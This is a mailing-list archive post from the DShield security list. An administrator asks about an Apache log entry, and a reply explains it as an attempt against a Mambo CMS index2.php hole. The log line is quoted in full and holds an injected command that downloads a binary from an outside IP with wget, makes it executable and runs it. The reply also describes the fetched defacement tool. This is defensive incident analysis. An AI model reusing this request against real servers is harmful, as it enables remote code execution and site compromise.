[Dshield] Can Someone Decipher This Log Entry?

Meidinger Chris chris.meidinger at badenIT.de
Thu Dec 22 09:51:11 GMT 2005

Hi David,

google tells me that com_content is part of Mambo, whis an open source mini-CMS.

So it looks like a hole in index2.php


which can be used to execute code from a URL


What is at that URL?
(cmeid at phantom)(285/pts/9)(10:46am:12/22/05)-
(%:~/LIVE-MALWARE)- wget &> /dev/null
(cmeid at phantom)(286/pts/9)(10:46am:12/22/05)-
(%:~/LIVE-MALWARE)- file cmd.gif
cmd.gif: exported SGML document text
(cmeid at phantom)(287/pts/9)(10:46am:12/22/05)-
(%:~/LIVE-MALWARE)- head cmd.gif
Defacing Tool 2.0 by r3v3ng4ns
revengans at gmail.com
se for modificar o codigo, por favor, mantenha o nome de seus autores originais
e por favor, entre em contato comigo...

ae galera, serio, tem mta gente fdp q simplismente usa, nao seja soh um sucker do script,
n seja um lammer imbecil, n seja o merda dum script kiddie, n seja um babaca, ajude a melhora-lo tambem!!
(cmeid at phantom)(288/pts/9)(10:46am:12/22/05)-

So it's a defacing tool, which accepts command parameters:

&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 21 "-"

which tell it what to deface and how.

Fun stuff, huh?



-----Original Message-----
From: list-bounces at lists.dshield.org on behalf of David Cary Hart
Sent: Wed 21-Dec-05 22:53
To: DShield General Discussion List
Subject: [Dshield] Can Someone Decipher This Log Entry?
I have about 25 of these today. I've added index2.php to the firewall watcher.
I cannot make sense of this Apache print: - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 21 "-"

           Eliminate Spam: http://www.TQMcube.com/spam_trap.php
          Multi-RBL Check: http://www.TQMcube.com/rblcheck.php
            Zombie Graphs: http://www.TQMcube.com/zombies.php
              GeoGraphics: http://www.TQMcube.com/origins.php
Learn about Intrusion Detection in Depth from the comfort of your own couch:

send all posts to list at lists.dshield.org
To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list

More information about the list mailing list